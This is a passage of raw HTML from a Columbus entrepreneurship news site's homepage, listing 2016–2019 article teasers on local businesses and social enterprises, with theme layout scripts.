td_uid_3_5cdd84e96a167_rand td-pb-border-top"><h4 class="block-title"><span>Storytelling</span></h4><div id=td_uid_3_5cdd84e96a167 class="td_block_inner"> <div class="td-block-row"> <div class="td-block-span6"> <div class="td_module_2 td_module_wrap td-animation-stack" itemscope itemtype="https://schema.org/Article"> <div class="td-module-image"> <div class="td-module-thumb"><a href="https://themetropreneur.com/columbus/how-marigold-went-from-instagram-account-to-clintonville-storefront/" rel="bookmark" title="How Marigold Went from Instagram Account to Clintonville Storefront"><img width="324" height="160" itemprop="image" class="entry-thumb" src="https://themetropreneur.com/columbus/wp-content/uploads/2019/05/Marigold-Mfeature-324x160.jpg" alt="" title="How Marigold Went from Instagram Account to Clintonville Storefront"/></a></div> </div> <h3 itemprop="name" class="entry-title td-module-title"><a itemprop="url" href="https://themetropreneur.com/columbus/how-marigold-went-from-instagram-account-to-clintonville-storefront/" rel="bookmark" title="How Marigold Went from Instagram Account to Clintonville Storefront">How Marigold Went from Instagram Account to Clintonville Storefront</a></h3> <div class="td-module-meta-info"> <div class="td-post-author-name"><a itemprop="author" href="https://themetropreneur.com/columbus/author/susan-post/">Susan Post</a> <span>-</span> </div> <div class="td-post-date"><time itemprop="dateCreated" class="entry-date updated td-module-date" datetime="2019-05-07T14:27:57+00:00" >May 7, 2019</time><meta itemprop="interactionCount" content="UserComments:0"/></div> </div> <div class="td-excerpt"> It&#039;s clicks to bricks for one new Clintonville storefront. What started as a successful Instagram account is now a retail storefront as... </div> <meta itemprop="author" content = "Susan Post"><meta itemprop="datePublished" content="2019-05-07T14:27:57+00:00"><meta itemprop="headline " content="How Marigold Went from Instagram Account to Clintonville Storefront"><meta itemprop="image" content="https://themetropreneur.com/columbus/wp-content/uploads/2019/05/Marigold-Mfeature.jpg"><meta itemprop="interactionCount" content="UserComments:0"/> </div> </div> <!-- ./td-block-span6 --> <div class="td-block-span6"> <div class="td_module_2 td_module_wrap td-animation-stack" itemscope itemtype="https://schema.org/Article"> <div class="td-module-image"> <div class="td-module-thumb"><a href="https://themetropreneur.com/columbus/traxler-printing-moves-to-larger-space-expands-capabilities/" rel="bookmark" title="Traxler Printing Moves to Larger Space, Expands Capabilities"><img width="324" height="160" itemprop="image" class="entry-thumb" src="https://themetropreneur.com/columbus/wp-content/uploads/2019/05/Traxler-Feature-324x160.jpg" alt="" title="Traxler Printing Moves to Larger Space, Expands Capabilities"/></a></div> </div> <h3 itemprop="name" class="entry-title td-module-title"><a itemprop="url" href="https://themetropreneur.com/columbus/traxler-printing-moves-to-larger-space-expands-capabilities/" rel="bookmark" title="Traxler Printing Moves to Larger Space, Expands Capabilities">Traxler Printing Moves to Larger Space, Expands Capabilities</a></h3> <div class="td-module-meta-info"> <div class="td-post-author-name"><a itemprop="author" href="https://themetropreneur.com/columbus/author/susan-post/">Susan Post</a> <span>-</span> </div> <div class="td-post-date"><time itemprop="dateCreated" class="entry-date updated td-module-date" datetime="2019-05-02T15:01:37+00:00" >May 2, 2019</time><meta itemprop="interactionCount" content="UserComments:0"/></div> </div> <div class="td-excerpt"> For the fifth time in nine years, Traxler Printing is on the move. The growing printing company is settling in at 3005... </div> <meta itemprop="author" content = "Susan Post"><meta itemprop="datePublished" content="2019-05-02T15:01:37+00:00"><meta itemprop="headline " content="Traxler Printing Moves to Larger Space, Expands Capabilities"><meta itemprop="image" content="https://themetropreneur.com/columbus/wp-content/uploads/2019/05/Traxler-Feature.jpg"><meta itemprop="interactionCount" content="UserComments:0"/> </div> </div> <!-- ./td-block-span6 --></div><!--./row-fluid--> <div class="td-block-row"> <div class="td-block-span6"> <div class="td_module_6 td_module_wrap td-animation-stack" itemscope itemtype="https://schema.org/Article"> <div class="td-module-thumb"><a href="https://themetropreneur.com/columbus/prescribe-fit-connects-physicians-patients-fitness-specialists/" rel="bookmark" title="Prescribe FIT Connects Physicians, Patients &amp; Fitness Specialists"><img width="100" height="70" itemprop="image" class="entry-thumb" src="https://themetropreneur.com/columbus/wp-content/uploads/2019/04/PrescribeFit-Feature-100x70.jpg" alt="" title="Prescribe FIT Connects Physicians, Patients &amp; Fitness Specialists"/></a></div> <div class="item-details"> <h3 itemprop="name" class="entry-title td-module-title"><a itemprop="url" href="https://themetropreneur.com/columbus/prescribe-fit-connects-physicians-patients-fitness-specialists/" rel="bookmark" title="Prescribe FIT Connects Physicians, Patients &amp; Fitness Specialists">Prescribe FIT Connects Physicians, Patients &amp; Fitness Specialists</a></h3> <div class="td-module-meta-info"> <div class="td-post-date"><time itemprop="dateCreated" class="entry-date updated td-module-date" datetime="2019-04-22T16:36:25+00:00" >April 22, 2019</time><meta itemprop="interactionCount" content="UserComments:0"/></div> </div> </div> <meta itemprop="author" content = "Susan Post"><meta itemprop="datePublished" content="2019-04-22T16:36:25+00:00"><meta itemprop="headline " content="Prescribe FIT Connects Physicians, Patients &amp; Fitness Specialists"><meta itemprop="image" content="https://themetropreneur.com/columbus/wp-content/uploads/2019/04/PrescribeFit-Feature.jpg"><meta itemprop="interactionCount" content="UserComments:0"/> </div> </div> <!-- ./td-block-span6 --> <div class="td-block-span6"> <div class="td_module_6 td_module_wrap td-animation-stack" itemscope itemtype="https://schema.org/Article"> <div class="td-module-thumb"><a href="https://themetropreneur.com/columbus/honest-jobs/" rel="bookmark" title="Honest Jobs Platform Launched by Local Entrepreneur"><img width="100" height="70" itemprop="image" class="entry-thumb" src="https://themetropreneur.com/columbus/wp-content/uploads/2019/04/HonestJobs-100x70.jpg" alt="" title="Honest Jobs Platform Launched by Local Entrepreneur"/></a></div> <div class="item-details"> <h3 itemprop="name" class="entry-title td-module-title"><a itemprop="url" href="https://themetropreneur.com/columbus/honest-jobs/" rel="bookmark" title="Honest Jobs Platform Launched by Local Entrepreneur">Honest Jobs Platform Launched by Local Entrepreneur</a></h3> <div class="td-module-meta-info"> <div class="td-post-date"><time itemprop="dateCreated" class="entry-date updated td-module-date" datetime="2019-04-11T12:33:47+00:00" >April 11, 2019</time><meta itemprop="interactionCount" content="UserComments:0"/></div> </div> </div> <meta itemprop="author" content = "Susan Post"><meta itemprop="datePublished" content="2019-04-11T12:33:47+00:00"><meta itemprop="headline " content="Honest Jobs Platform Launched by Local Entrepreneur"><meta itemprop="image" content="https://themetropreneur.com/columbus/wp-content/uploads/2019/04/HonestJobs.jpg"><meta itemprop="interactionCount" content="UserComments:0"/> </div> </div> <!-- ./td-block-span6 --></div><!--./row-fluid--> <div class="td-block-row"> <div class="td-block-span6"> <div class="td_module_6 td_module_wrap td-animation-stack" itemscope itemtype="https://schema.org/Article"> <div class="td-module-thumb"><a href="https://themetropreneur.com/columbus/startups-how-to-raise-capital-find-the-financial-expertise-they-need-with-book-street/" rel="bookmark" title="Startups Find the Financial Expertise They Need with Book + Street"><img width="100" height="70" itemprop="image" class="entry-thumb" src="https://themetropreneur.com/columbus/wp-content/uploads/2019/04/BookStreet-100x70.jpg" alt="" title="Startups Find the Financial Expertise They Need with Book + Street"/></a></div> <div class="item-details"> <h3 itemprop="name" class="entry-title td-module-title"><a itemprop="url" href="https://themetropreneur.com/columbus/startups-how-to-raise-capital-find-the-financial-expertise-they-need-with-book-street/" rel="bookmark" title="Startups Find the Financial Expertise They Need with Book + Street">Startups Find the Financial Expertise They Need with Book + Street</a></h3> <div class="td-module-meta-info"> <div class="td-post-date"><time itemprop="dateCreated" class="entry-date updated td-module-date" datetime="2019-04-09T10:02:49+00:00" >April 9, 2019</time><meta itemprop="interactionCount" content="UserComments:0"/></div> </div> </div> <meta itemprop="author" content = "Susan Post"><meta itemprop="datePublished" content="2019-04-09T10:02:49+00:00"><meta itemprop="headline " content="Startups Find the Financial Expertise They Need with Book + Street"><meta itemprop="image" content="https://themetropreneur.com/columbus/wp-content/uploads/2019/04/BookStreet.jpg"><meta itemprop="interactionCount" content="UserComments:0"/> </div> </div> <!-- ./td-block-span6 --> <div class="td-block-span6"> <div class="td_module_6 td_module_wrap td-animation-stack" itemscope itemtype="https://schema.org/Article"> <div class="td-module-thumb"><a href="https://themetropreneur.com/columbus/edgework-creative-launches-in-house-furniture-line/" rel="bookmark" title="Edgework Creative Launches In-House Furniture Line"><img width="100" height="70" itemprop="image" class="entry-thumb" src="https://themetropreneur.com/columbus/wp-content/uploads/2019/03/Edgework-Feature-100x70.jpg" alt="" title="Edgework Creative Launches In-House Furniture Line"/></a></div> <div class="item-details"> <h3 itemprop="name" class="entry-title td-module-title"><a itemprop="url" href="https://themetropreneur.com/columbus/edgework-creative-launches-in-house-furniture-line/" rel="bookmark" title="Edgework Creative Launches In-House Furniture Line">Edgework Creative Launches In-House Furniture Line</a></h3> <div class="td-module-meta-info"> <div class="td-post-date"><time itemprop="dateCreated" class="entry-date updated td-module-date" datetime="2019-03-06T14:01:06+00:00" >March 6, 2019</time><meta itemprop="interactionCount" content="UserComments:0"/></div> </div> </div> <meta itemprop="author" content = "Susan Post"><meta itemprop="datePublished" content="2019-03-06T14:01:06+00:00"><meta itemprop="headline " content="Edgework Creative Launches In-House Furniture Line"><meta itemprop="image" content="https://themetropreneur.com/columbus/wp-content/uploads/2019/03/Edgework-Feature.jpg"><meta itemprop="interactionCount" content="UserComments:0"/> </div> </div> <!-- ./td-block-span6 --></div><!--./row-fluid--></div></div> <!-- ./block --><script>var block_td_uid_4_5cdd84e96d74e = new tdBlock(); block_td_uid_4_5cdd84e96d74e.id = "td_uid_4_5cdd84e96d74e"; block_td_uid_4_5cdd84e96d74e.atts = '{"custom_title":"At Work","category_id":"425","limit":"3","class":"td_uid_4_5cdd84e96d74e_rand"}'; block_td_uid_4_5cdd84e96d74e.td_column_number = "2"; block_td_uid_4_5cdd84e96d74e.block_type = "td_block_15"; block_td_uid_4_5cdd84e96d74e.post_count = "3"; block_td_uid_4_5cdd84e96d74e.found_posts = "65"; block_td_uid_4_5cdd84e96d74e.header_color = ""; block_td_uid_4_5cdd84e96d74e.ajax_pagination_infinite_stop = ""; block_td_uid_4_5cdd84e96d74e.max_num_pages = "22"; tdBlocksArray.push(block_td_uid_4_5cdd84e96d74e); </script><div class="td_block_wrap td_block_15 td_uid_4_5cdd84e96d74e_rand td-pb-border-top"><h4 class="block-title"><span>At Work</span></h4><div id=td_uid_4_5cdd84e96d74e class="td_block_inner td-column-2"> <div class="td-block-row"> <div class="td-block-span4"> <div class="td_module_mx4 td_module_wrap td-animation-stack" itemscope itemtype="https://schema.org/Article"> <div class="td-module-image"> <div class="td-module-thumb"><a href="https://themetropreneur.com/columbus/at-work-compton-constructions-creative-office-tour-office-makeover-on-parsons-avenue/" rel="bookmark" title="At Work: Compton Construction&#8217;s Creative Office on Parsons Avenue"><img width="218" height="150" itemprop="image" class="entry-thumb" src="https://themetropreneur.com/columbus/wp-content/uploads/2018/08/CC28OutsideFeature-218x150.jpg" alt="office tours of creative office spaces" title="At Work: Compton Construction&#8217;s Creative Office on Parsons Avenue"/></a></div> </div> <h3 itemprop="name" class="entry-title td-module-title"><a itemprop="url" href="https://themetropreneur.com/columbus/at-work-compton-constructions-creative-office-tour-office-makeover-on-parsons-avenue/" rel="bookmark" title="At Work: Compton Construction&#8217;s Creative Office on Parsons Avenue">At Work: Compton Construction&#8217;s Creative Office on Parsons Avenue</a></h3> <meta itemprop="author" content = "Anne Evans"><meta itemprop="datePublished" content="2018-08-09T15:11:57+00:00"><meta itemprop="headline " content="At Work: Compton Construction&#039;s Creative Office on Parsons Avenue"><meta itemprop="image" content="https://themetropreneur.com/columbus/wp-content/uploads/2018/08/CC28OutsideFeature.jpg"><meta itemprop="interactionCount" content="UserComments:0"/> </div> </div> <!-- ./td-block-span4 --> <div class="td-block-span4"> <div class="td_module_mx4 td_module_wrap td-animation-stack" itemscope itemtype="https://schema.org/Article"> <div class="td-module-image"> <div class="td-module-thumb"><a href="https://themetropreneur.com/columbus/at-work-yao-cheng-designs-creative-studio/" rel="bookmark" title="At Work: Yao Cheng Design&#8217;s Downtown Creative Studio"><img width="218" height="150" itemprop="image" class="entry-thumb" src="https://themetropreneur.com/columbus/wp-content/uploads/2016/11/Yao5-218x150.jpg" alt="" title="At Work: Yao Cheng Design&#8217;s Downtown Creative Studio"/></a></div> </div> <h3 itemprop="name" class="entry-title td-module-title"><a itemprop="url" href="https://themetropreneur.com/columbus/at-work-yao-cheng-designs-creative-studio/" rel="bookmark" title="At Work: Yao Cheng Design&#8217;s Downtown Creative Studio">At Work: Yao Cheng Design&#8217;s Downtown Creative Studio</a></h3> <meta itemprop="author" content = "Anne Evans"><meta itemprop="datePublished" content="2016-11-30T08:00:13+00:00"><meta itemprop="headline " content="At Work: Yao Cheng Design&#039;s Downtown Creative Studio"><meta itemprop="image" content="https://themetropreneur.com/columbus/wp-content/uploads/2016/11/Yao5.jpg"><meta itemprop="interactionCount" content="UserComments:0"/> </div> </div> <!-- ./td-block-span4 --> <div class="td-block-span4"> <div class="td_module_mx4 td_module_wrap td-animation-stack" itemscope itemtype="https://schema.org/Article"> <div class="td-module-image"> <div class="td-module-thumb"><a href="https://themetropreneur.com/columbus/at-work-crosschx-adds-creative-office-space-to-main-street-corner/" rel="bookmark" title="At Work: CrossChx Adds Creative Office Space to Main Street Corner"><img width="218" height="150" itemprop="image" class="entry-thumb" src="https://themetropreneur.com/columbus/wp-content/uploads/2016/03/crosschx-218x150.jpg" alt="" title="At Work: CrossChx Adds Creative Office Space to Main Street Corner"/></a></div> </div> <h3 itemprop="name" class="entry-title td-module-title"><a itemprop="url" href="https://themetropreneur.com/columbus/at-work-crosschx-adds-creative-office-space-to-main-street-corner/" rel="bookmark" title="At Work: CrossChx Adds Creative Office Space to Main Street Corner">At Work: CrossChx Adds Creative Office Space to Main Street Corner</a></h3> <meta itemprop="author" content = "Anne Evans"><meta itemprop="datePublished" content="2016-03-18T08:00:08+00:00"><meta itemprop="headline " content="At Work: CrossChx Adds Creative Office Space to Main Street Corner"><meta itemprop="image" content="https://themetropreneur.com/columbus/wp-content/uploads/2016/03/crosschx.jpg"><meta itemprop="interactionCount" content="UserComments:0"/> </div> </div> <!-- ./td-block-span4 --></div><!--./row-fluid--></div></div> <!-- ./block --><script>var block_td_uid_5_5cdd84e96ef8c = new tdBlock(); block_td_uid_5_5cdd84e96ef8c.id = "td_uid_5_5cdd84e96ef8c"; block_td_uid_5_5cdd84e96ef8c.atts = '{"custom_title":"Social Entrepreneurship","category_id":"4616","limit":5,"class":"td_uid_5_5cdd84e96ef8c_rand"}'; block_td_uid_5_5cdd84e96ef8c.td_column_number = "2"; block_td_uid_5_5cdd84e96ef8c.block_type = "td_block_1"; block_td_uid_5_5cdd84e96ef8c.post_count = "5"; block_td_uid_5_5cdd84e96ef8c.found_posts = "96"; block_td_uid_5_5cdd84e96ef8c.header_color = ""; block_td_uid_5_5cdd84e96ef8c.ajax_pagination_infinite_stop = ""; block_td_uid_5_5cdd84e96ef8c.max_num_pages = "20"; tdBlocksArray.push(block_td_uid_5_5cdd84e96ef8c); </script><div class="td_block_wrap td_block_1 td_uid_5_5cdd84e96ef8c_rand td-pb-border-top"><h4 class="block-title"><span>Social Entrepreneurship</span></h4><div id=td_uid_5_5cdd84e96ef8c class="td_block_inner"> <div class="td-block-row"> <div class="td-block-span6"> <div class="td_module_4 td_module_wrap td-animation-stack" itemscope itemtype="https://schema.org/Article"> <div class="td-module-image"> <div class="td-module-thumb"><a href="https://themetropreneur.com/columbus/john-rush-on-the-evolving-social-enterprise-ecosystem-in-central-ohio/" rel="bookmark" title="John Rush on the Evolving Social Enterprise Ecosystem in Central Ohio"><img width="324" height="235" itemprop="image" class="entry-thumb" src="https://themetropreneur.com/columbus/wp-content/uploads/2019/05/John-Headshot-324x235.jpg" alt="" title="John Rush on the Evolving Social Enterprise Ecosystem in Central Ohio"/></a></div> </div> <h3 itemprop="name" class="entry-title td-module-title"><a itemprop="url" href="https://themetropreneur.com/columbus/john-rush-on-the-evolving-social-enterprise-ecosystem-in-central-ohio/" rel="bookmark" title="John Rush on the Evolving Social Enterprise Ecosystem in Central Ohio">John Rush on the Evolving Social Enterprise Ecosystem in Central Ohio</a></h3> <div class="td-module-meta-info"> <div class="td-post-author-name"><a itemprop="author" href="https://themetropreneur.com/columbus/author/brett-lawrence/">Brett Lawrence</a> <span>-</span> </div> <div class="td-post-date"><time itemprop="dateCreated" class="entry-date updated td-module-date" datetime="2019-05-03T10:27:34+00:00" >May 3, 2019</time><meta itemprop="interactionCount" content="UserComments:0"/></div> </div> <div class="td-excerpt"> When John Rush began contemplating a move from Chicago to Columbus nearly a decade ago to launch what would become CleanTurn, he... </div> <meta itemprop="author" content = "Brett Lawrence"><meta itemprop="datePublished" content="2019-05-03T10:27:34+00:00"><meta itemprop="headline " content="John Rush on the Evolving Social Enterprise Ecosystem in Central Ohio"><meta itemprop="image" content="https://themetropreneur.com/columbus/wp-content/uploads/2019/05/John-Headshot.jpg"><meta itemprop="interactionCount" content="UserComments:0"/> </div> </div> <!-- ./td-block-span6 --> <div class="td-block-span6"> <div class="td_module_6 td_module_wrap td-animation-stack" itemscope itemtype="https://schema.org/Article"> <div class="td-module-thumb"><a href="https://themetropreneur.com/columbus/honest-jobs/" rel="bookmark" title="Honest Jobs Platform Launched by Local Entrepreneur"><img width="100" height="70" itemprop="image" class="entry-thumb" src="https://themetropreneur.com/columbus/wp-content/uploads/2019/04/HonestJobs-100x70.jpg" alt="" title="Honest Jobs Platform Launched by Local Entrepreneur"/></a></div> <div class="item-details"> <h3 itemprop="name" class="entry-title td-module-title"><a itemprop="url" href="https://themetropreneur.com/columbus/honest-jobs/" rel="bookmark" title="Honest Jobs Platform Launched by Local Entrepreneur">Honest Jobs Platform Launched by Local Entrepreneur</a></h3> <div class="td-module-meta-info"> <div class="td-post-date"><time itemprop="dateCreated" class="entry-date updated td-module-date" datetime="2019-04-11T12:33:47+00:00" >April 11, 2019</time><meta itemprop="interactionCount" content="UserComments:0"/></div> </div> </div> <meta itemprop="author" content = "Susan Post"><meta itemprop="datePublished" content="2019-04-11T12:33:47+00:00"><meta itemprop="headline " content="Honest Jobs Platform Launched by Local Entrepreneur"><meta itemprop="image" content="https://themetropreneur.com/columbus/wp-content/uploads/2019/04/HonestJobs.jpg"><meta itemprop="interactionCount" content="UserComments:0"/> </div> <div class="td_module_6 td_module_wrap td-animation-stack" itemscope itemtype="https://schema.org/Article"> <div class="td-module-thumb"><a href="https://themetropreneur.com/columbus/furniture-bank-of-central-ohio-two-social-enterprises-with-a-third-on-the-way/" rel="bookmark" title="Furniture Bank of Central Ohio: Two Social Enterprises with a Third on the Way"><img width="100" height="70" itemprop="image" class="entry-thumb" src="https://themetropreneur.com/columbus/wp-content/uploads/2019/04/FurnitureBank-1-100x70.jpg" alt="" title="Furniture Bank of Central Ohio: Two Social Enterprises with a Third on the Way"/></a></div> <div class="item-details"> <h3 itemprop="name" class="entry-title td-module-title"><a itemprop="url" href="https://themetropreneur.com/columbus/furniture-bank-of-central-ohio-two-social-enterprises-with-a-third-on-the-way/" rel="bookmark" title="Furniture Bank of Central Ohio: Two Social Enterprises with a Third on the Way">Furniture Bank of Central Ohio: Two Social Enterprises with a Third...</a></h3> <div class="td-module-meta-info"> <div class="td-post-date"><time itemprop="dateCreated" class="entry-date updated td-module-date" datetime="2019-04-05T11:08:18+00:00" >April 5, 2019</time><meta itemprop="interactionCount" content="UserComments:0"/></div> </div> </div> <meta itemprop="author" content = "Sara Parker"><meta itemprop="datePublished" content="2019-04-05T11:08:18+00:00"><meta itemprop="headline " content="Furniture Bank of Central Ohio: Two Social Enterprises with a Third on the Way"><meta itemprop="image" content="https://themetropreneur.com/columbus/wp-content/uploads/2019/04/FurnitureBank-1.jpg"><meta itemprop="interactionCount" content="UserComments:0"/> </div> <div class="td_module_6 td_module_wrap td-animation-stack" itemscope itemtype="https://schema.org/Article"> <div class="td-module-thumb"><a href="https://themetropreneur.com/columbus/roosevelt-coffee-roasters-break-even-make-good-fight-social-injustice/" rel="bookmark" title="Roosevelt Coffee Roasters: Break Even, Make Good, Fight Social Injustice"><img width="100" height="70" itemprop="image" class="entry-thumb" src="https://themetropreneur.com/columbus/wp-content/uploads/2019/03/SV-March-Roosevelt-100x70.jpg" alt="" title="Roosevelt Coffee Roasters: Break Even, Make Good, Fight Social Injustice"/></a></div> <div class="item-details"> <h3 itemprop="name" class="entry-title td-module-title"><a itemprop="url" href="https://themetropreneur.com/columbus/roosevelt-coffee-roasters-break-even-make-good-fight-social-injustice/" rel="bookmark" title="Roosevelt Coffee Roasters: Break Even, Make Good, Fight Social Injustice">Roosevelt Coffee Roasters: Break Even, Make Good, Fight Social Injustice</a></h3> <div class="td-module-meta-info"> <div class="td-post-date"><time itemprop="dateCreated" class="entry-date updated td-module-date" datetime="2019-03-26T12:16:15+00:00" >March 26, 2019</time><meta itemprop="interactionCount" content="UserComments:0"/></div> </div> </div> <meta itemprop="author" content = "Sara Parker"><meta itemprop="datePublished" content="2019-03-26T12:16:15+00:00"><meta itemprop="headline " content="Roosevelt Coffee Roasters: Break Even, Make Good, Fight Social Injustice"><meta itemprop="image" content="https://themetropreneur.com/columbus/wp-content/uploads/2019/03/SV-March-Roosevelt.jpg"><meta itemprop="interactionCount" content="UserComments:0"/> </div> <div class="td_module_6 td_module_wrap td-animation-stack" itemscope itemtype="https://schema.org/Article"> <div class="td-module-thumb"><a href="https://themetropreneur.com/columbus/social-enterprises-take-the-stage-for-socialventures-nonprofit-sustainability-showcase/" rel="bookmark" title="Social Enterprises Take the Stage for SocialVentures&#8217; Nonprofit Sustainability Showcase"><img width="100" height="70" itemprop="image" class="entry-thumb" src="https://themetropreneur.com/columbus/wp-content/uploads/2019/02/SV-Feb1-1-100x70.jpg" alt="" title="Social Enterprises Take the Stage for SocialVentures&#8217; Nonprofit Sustainability Showcase"/></a></div> <div class="item-details"> <h3 itemprop="name" class="entry-title td-module-title"><a itemprop="url" href="https://themetropreneur.com/columbus/social-enterprises-take-the-stage-for-socialventures-nonprofit-sustainability-showcase/" rel="bookmark" title="Social Enterprises Take the Stage for SocialVentures&#8217; Nonprofit Sustainability Showcase">Social Enterprises Take the Stage for SocialVentures&#8217; Nonprofit Sustainability Showcase</a></h3> <div class="td-module-meta-info"> <div class="td-post-date"><time itemprop="dateCreated" class="entry-date updated td-module-date" datetime="2019-02-21T13:00:18+00:00" >February 21, 2019</time><meta itemprop="interactionCount" content="UserComments:0"/></div> </div> </div> <meta itemprop="author" content = "Sara Parker"><meta itemprop="datePublished" content="2019-02-21T13:00:18+00:00"><meta itemprop="headline " content="Social Enterprises Take the Stage for SocialVentures&#039; Nonprofit Sustainability Showcase"><meta itemprop="image" content="https://themetropreneur.com/columbus/wp-content/uploads/2019/02/SV-Feb1-1.jpg"><meta itemprop="interactionCount" content="UserComments:0"/> </div> </div> <!-- ./td-block-span6 --></div><!--./row-fluid--></div></div> <!-- ./block --><script>var block_td_uid_6_5cdd84e9713ca = new tdBlock(); block_td_uid_6_5cdd84e9713ca.id = "td_uid_6_5cdd84e9713ca"; block_td_uid_6_5cdd84e9713ca.atts = '{"custom_title":"Announcements","category_id":"22","limit":"3","class":"td_uid_6_5cdd84e9713ca_rand"}'; block_td_uid_6_5cdd84e9713ca.td_column_number = "2"; block_td_uid_6_5cdd84e9713ca.block_type = "td_block_21"; block_td_uid_6_5cdd84e9713ca.post_count = "3"; block_td_uid_6_5cdd84e9713ca.found_posts = "311"; block_td_uid_6_5cdd84e9713ca.header_color = ""; block_td_uid_6_5cdd84e9713ca.ajax_pagination_infinite_stop = ""; block_td_uid_6_5cdd84e9713ca.max_num_pages = "104"; tdBlocksArray.push(block_td_uid_6_5cdd84e9713ca); </script><div class="td_block_wrap td_block_21 td_uid_6_5cdd84e9713ca_rand td-pb-border-top"><h4 class="block-title"><span>Announcements</span></h4><div id=td_uid_6_5cdd84e9713ca class="td_block_inner"> <div class="td_module_16 td_module_wrap td-animation-stack" itemscope itemtype="https://schema.org/Article"> <div class="td-module-thumb"><a href="https://themetropreneur.com/columbus/calling-all-non-profits-applications-open-for-philanthropitch/" rel="bookmark" title="Calling All Non-Profits: Applications Open for Philanthropitch"><img width="150" height="150" itemprop="image" class="entry-thumb" src="https://themetropreneur.com/columbus/wp-content/uploads/2018/10/Philanthropitch-150x150.jpg" alt="" title="Calling All Non-Profits: Applications Open for Philanthropitch"/></a></div> <div class="item-details"> <h3 itemprop="name" class="entry-title td-module-title"><a itemprop="url" href="https://themetropreneur.com/columbus/calling-all-non-profits-applications-open-for-philanthropitch/" rel="bookmark" title="Calling All Non-Profits: Applications Open for Philanthropitch">Calling All Non-Profits: Applications Open for Philanthropitch</a></h3> <div class="td-module-meta-info"> <div class="td-post-author-name"><a itemprop="author" href="https://themetropreneur.com/columbus/author/susan-post/">Susan Post</a> <span>-</span> </div> <div class="td-post-date"><time itemprop="dateCreated" class="entry-date updated td-module-date" datetime="2018-10-16T16:53:17+00:00" >October 16, 2018</time><meta itemprop="interactionCount" content="UserComments:0"/></div> </div> <div class="td-excerpt"> Social impact fast pitch competition Philanthropitch is headed for Columbus. The Texas-based organization is seeking applicants for its first Columbus pitch, scheduled for Monday,... </div> </div> <meta itemprop="author" content = "Susan Post"><meta itemprop="datePublished" content="2018-10-16T16:53:17+00:00"><meta itemprop="headline " content="Calling All Non-Profits: Applications Open for Philanthropitch"><meta itemprop="image" content="https://themetropreneur.com/columbus/wp-content/uploads/2018/10/Philanthropitch.jpg"><meta itemprop="interactionCount" content="UserComments:0"/> </div> <div class="td_module_16 td_module_wrap td-animation-stack" itemscope itemtype="https://schema.org/Article"> <div class="td-module-thumb"><a href="https://themetropreneur.com/columbus/determined-entrepreneur-program-wants-take-business-owners-next-level/" rel="bookmark" title="The Determined Entrepreneur Program Wants to Take Business Owners to the Next Level"><img width="150" height="150" itemprop="image" class="entry-thumb" src="https://themetropreneur.com/columbus/wp-content/uploads/2018/08/DeterminedEntrepreneur-150x150.jpg" alt="" title="The Determined Entrepreneur Program Wants to Take Business Owners to the Next Level"/></a></div> <div class="item-details"> <h3 itemprop="name" class="entry-title td-module-title"><a itemprop="url" href="https://themetropreneur.com/columbus/determined-entrepreneur-program-wants-take-business-owners-next-level/" rel="bookmark" title="The Determined Entrepreneur Program Wants to Take Business Owners to the Next Level">The Determined Entrepreneur Program Wants to Take Business Owners to the Next Level</a></h3> <div class="td-module-meta-info"> <div class="td-post-author-name"><a itemprop="author" href="https://themetropreneur.com/columbus/author/taijuan-moorman/">Taijuan Moorman</a> <span>-</span> </div> <div class="td-post-date"><time itemprop="dateCreated" class="entry-date updated td-module-date" datetime="2018-08-28T09:34:33+00:00" >August 28, 2018</time><meta itemprop="interactionCount" content="UserComments:0"/></div> </div> <div class="td-excerpt"> A new 12-week entrepreneurship program is coming to Columbus in September. The Determined Entrepreneur Program is designed for owners who have typically been in business a... </div> </div> <meta itemprop="author" content = "Taijuan Moorman"><meta itemprop="datePublished" content="2018-08-28T09:34:33+00:00"><meta itemprop="headline " content="The Determined Entrepreneur Program Wants to Take Business Owners to the Next Level"><meta itemprop="image" content="https://themetropreneur.com/columbus/wp-content/uploads/2018/08/DeterminedEntrepreneur.jpg"><meta itemprop="interactionCount" content="UserComments:0"/> </div> <div class="td_module_16 td_module_wrap td-animation-stack" itemscope itemtype="https://schema.org/Article"> <div class="td-module-thumb"><a href="https://themetropreneur.com/columbus/news-roundup-root-valued-at-1b-new-leadership-at-the-idea-foundry-columbus-inc-5000-more/" rel="bookmark" title="News Roundup: Root Valued at $1B, New Leadership at the Idea Foundry, Columbus&#8217; Inc. 5000 &#038; More"><img width="150" height="150" itemprop="image" class="entry-thumb" src="https://themetropreneur.com/columbus/wp-content/uploads/2018/05/NewsRoundupGraphic-150x150.jpg" alt="" title="News Roundup: Root Valued at $1B, New Leadership at the Idea Foundry, Columbus&#8217; Inc. 5000 &#038; More"/></a></div> <div class="item-details"> <h3 itemprop="name" class="entry-title td-module-title"><a itemprop="url" href="https://themetropreneur.com/columbus/news-roundup-root-valued-at-1b-new-leadership-at-the-idea-foundry-columbus-inc-5000-more/" rel="bookmark" title="News Roundup: Root Valued at $1B, New Leadership at the Idea Foundry, Columbus&#8217; Inc. 5000 &#038; More">News Roundup: Root Valued at $1B, New Leadership at the Idea Foundry, Columbus&#8217; Inc....</a></h3> <div class="td-module-meta-info"> <div class="td-post-author-name"><a itemprop="author" href="https://themetropreneur.com/columbus/author/susan-post/">Susan Post</a> <span>-</span> </div> <div class="td-post-date"><time itemprop="dateCreated" class="entry-date updated td-module-date" datetime="2018-08-23T10:52:56+00:00" >August 23, 2018</time><meta itemprop="interactionCount" content="UserComments:0"/></div> </div> <div class="td-excerpt"> A $1 billion dollar valuation, a global acquisition and national recognition for continued success - Columbus companies are growing. Learn more about the businesses... </div> </div> <meta itemprop="author" content = "Susan Post"><meta itemprop="datePublished" content="2018-08-23T10:52:56+00:00"><meta itemprop="headline " content="News Roundup: Root Valued at $1B, New Leadership at the Idea Foundry, Columbus&#039; Inc. 5000 &amp; More"><meta itemprop="image" content="https://themetropreneur.com/columbus/wp-content/uploads/2018/05/NewsRoundupGraphic.jpg"><meta itemprop="interactionCount" content="UserComments:0"/> </div> </div></div> <!-- ./block --></div></div><div class="wpb_column vc_column_container td-pb-span4"><div class="wpb_wrapper"><div class="vc_separator wpb_content_element vc_separator_align_center vc_sep_width_100 vc_sep_pos_align_center vc_separator_no_text vc_sep_color_grey" ><span class="vc_sep_holder vc_sep_holder_l"><span class="vc_sep_line"></span></span><span class="vc_sep_holder vc_sep_holder_r"><span class="vc_sep_line"></span></span> </div><div class="td_block_wrap td_block_social_counter td_uid_7_5cdd84e9736db_rand td-pb-border-top"><div class="td_social_type td-pb-margin-side td_social_facebook"><div class="td-sp td-sp-facebook"></div><span class="td_social_info">4,280</span><span 